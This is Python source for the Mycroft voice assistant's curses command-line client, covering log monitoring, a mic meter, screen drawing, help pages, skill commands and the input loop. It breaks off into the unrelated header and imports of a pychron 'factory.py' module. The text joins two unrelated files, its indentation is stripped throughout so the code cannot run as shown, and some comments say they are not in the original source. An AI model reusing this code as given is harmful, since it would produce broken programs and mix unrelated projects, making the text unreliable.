LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
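# For reference (illustrative only, mirroring the keys handled above), the
# ~/.mycroft_cli.conf settings file is plain JSON along the lines of:
#   {"filters": ["mouth.viseme", "DEBUG"], "cy_chat_area": 7,
#    "show_last_key": false, "max_log_lines": 5000, "show_meter": true}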
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5
parts = line.split("=")
meter_thresh = float(parts[-1])
meter_cur = float(parts[-2].split(" ")[0])
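        # Illustrative example (not in the original source): a mic level line
        # such as "Energy:  cur=4 thresh=1.5" splits on "=" into
        # ["Energy:  cur", "4 thresh", "1.5"], giving meter_thresh = 1.5 and
        # meter_cur = 4.0.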
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Arguments:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS-x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad-x-len(msg))
else:
# pad to given length (or screen width)
if x+pad > curses.COLS:
pad = curses.COLS-x
s += ch * (pad-len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
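# Illustrative usage (not part of the original client): draw(0, 5, "Status:",
# pad=True, clr=CLR_HEADING) writes "Status:" on row 5 and pads with spaces to
# the right edge of the screen, while pad=20 pads/clips to a 20-column field.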
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
        # Colors (on black background):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(x, y, " "+make_titlebar("= GUI", gui_width-1)+" ", clr=CLR_HEADING)
cnt = len(gui_text)+1
if cnt > curses.LINES-15:
cnt = curses.LINES-15
for i in range(0, cnt):
draw(x, y+1+i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x+2, y+1+i, gui_text[i], pad=gui_width-3)
else:
draw(x+2, y+1+i, "*"*(gui_width-3))
draw(x+(gui_width-1), y+1+i, "!", clr=CLR_HEADING)
draw(x, y+cnt, " "+"-"*(gui_width-2)+" ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_full_redraw
global auto_scroll
global size_log_area
if time.time() - last_full_redraw > FULL_REDRAW_FREQUENCY:
        # Do a full-screen redraw periodically to clear any
        # noise from non-curses text that gets output to the
        # screen (e.g. modules that do a 'print')
scr.clear()
last_full_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS-1-len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS-1-len(ver), ver, CLR_HEADING)
y = 2
len_line = 0
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[27:] # skip logid & date/time at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if " - DEBUG - " in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif " - ERROR - " in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG1)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG2)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS-20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: "+last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [
(
'Log Scrolling shortcuts',
[
("Up / Down / PgUp / PgDn", "scroll thru history"),
("Ctrl+T / Ctrl+PgUp", "scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn", "scroll to bottom of logs" +
"(jump to newest)"),
("Left / Right", "scroll long lines left/right"),
("Home / End", "scroll to start/end of long lines")
]
),
(
"Query History shortcuts",
[
("Ctrl+N / Ctrl+Right", "previous query"),
("Ctrl+P / Ctrl+Left", "next query")
]
),
(
"General Commands (type ':' to enter command mode)",
[
(":quit or :exit", "exit the program"),
(":meter (show|hide)", "display the microphone level"),
(":keycode (show|hide)", "display typed key codes (mainly debugging)"),
(":history (# lines)", "set size of visible history buffer"),
(":clear", "flush the logs")
]
),
(
"Log Manipulation Commands",
[
(":filter 'STR'", "adds a log filter (optional quotes)"),
(":filter remove 'STR'", "removes a log filter"),
(":filter (clear|reset)", "reset filters"),
(":filter (show|list)", "display current filters"),
(":find 'STR'", "show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)", "set logging level"),
(":log bus (on|off)", "control logging of messagebus messages")
]
),
(
"Skill Debugging Commands",
[
(":skills", "list installed skills"),
(":activate SKILL", "activate skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL", "deactivate skill"),
(":keep SKILL", "deactivate all skills except " +
"the indicated skill")
]
)
]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " "+w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""
    Show list of loaded skills in as many columns as necessary
"""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
scr.get_wch() # blocks
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI loop
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
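# Illustrative examples (not in the original source) of the de-quoting above:
#   _get_cmd_param("find 'abc def'", "find")             -> "abc def"
#   _get_cmd_param("log level DEBUG", ["log", "level"])  -> "DEBUG"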
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
        # List loaded skills
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time()-start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time()-start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
            else:
                last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')}))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
    except Exception as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = WebsocketClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
factory.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from __future__ import print_function
from pyface.timer.do_later import do_later
from traits.api import Instance, Button, Bool, Property, \
DelegatesTo, List, Str
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.dvc.dvc_irradiationable import DVCAble
from pychron.experiment.auto_gen_config import AutoGenConfig
from pychron.experiment.automated_run.factory import AutomatedRunFactory
from pychron.experiment.automated_run.uv.factory import UVAutomatedRunFactory
from pychron.experiment.queue.experiment_queue import ExperimentQueue
from pychron.experiment.queue.factory import ExperimentQueueFactory
from pychron.experiment.undoer import ExperimentUndoer
from pychron.experiment.utilities.identifier import convert_extract_device
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
